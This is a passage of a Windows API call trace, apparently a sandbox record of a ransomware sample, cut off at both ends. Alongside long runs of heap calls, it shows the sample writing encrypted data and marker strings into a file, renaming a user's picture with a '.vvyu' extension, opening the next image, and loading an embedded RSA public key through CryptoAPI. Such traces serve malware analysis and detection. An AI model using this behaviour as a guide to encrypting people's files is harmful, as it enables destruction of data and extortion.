Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.818] GetCurrentThreadId () returned 0x5d8 [0190.818] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ee8 [0190.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0190.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f18 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f30 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f48 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f60 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f90 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f78 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f60 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ee8 [0190.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f90 | out: hHeap=0x2c0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ee8 | out: hHeap=0x2c0000) returned 1 [0190.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.823] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.824] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0190.825] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0190.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0190.827] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ed0 | out: hHeap=0x2c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3468 | out: hHeap=0x2c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.828] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0190.829] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.830] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.830] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x729f, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x729f, lpOverlapped=0x0) returned 1 [0190.831] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.831] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x72a4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.831] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.832] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.832] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.832] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.833] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.833] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.833] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.833] CloseHandle (hObject=0x584) returned 1 [0190.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.834] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.835] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.835] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\khH4Ja_FfUDbLB.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\khh4ja_ffudblb.gif"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\khH4Ja_FfUDbLB.gif.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\khh4ja_ffudblb.gif.vvyu")) returned 1 [0190.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.836] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.836] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.839] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb15a370, ftCreationTime.dwHighDateTime=0x1d8a261, ftLastAccessTime.dwLowDateTime=0xea7a4b60, ftLastAccessTime.dwHighDateTime=0x1d8a33f, ftLastWriteTime.dwLowDateTime=0xea7a4b60, ftLastWriteTime.dwHighDateTime=0x1d8a33f, nFileSizeHigh=0x0, nFileSizeLow=0x5d00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Ldaf6aCTl2hfcZ.gif", cAlternateFileName="LDAF6A~1.GIF")) returned 1 [0190.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3468 [0190.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0190.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3468 | out: hHeap=0x2c0000) returned 1 [0190.840] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\Ldaf6aCTl2hfcZ.gif") returned=".gif" [0190.840] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\Ldaf6aCTl2hfcZ.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ldaf6actl2hfcz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.840] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=23808) returned 1 [0190.840] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.843] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5cda, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.843] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.846] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.846] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0x5d00, lpOverlapped=0x0) returned 1 [0190.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.847] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.847] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.848] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.848] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.848] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.848] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.848] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.848] GetLastError () returned 0x0 [0190.848] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.849] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.849] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.849] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.849] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.849] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.849] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5d00) returned 0x2af5168 [0190.849] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3468 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af34b0 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f30 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f78 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.850] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f78 | out: hHeap=0x2c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f48 | out: hHeap=0x2c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f48 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e30 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f78 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5f18 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 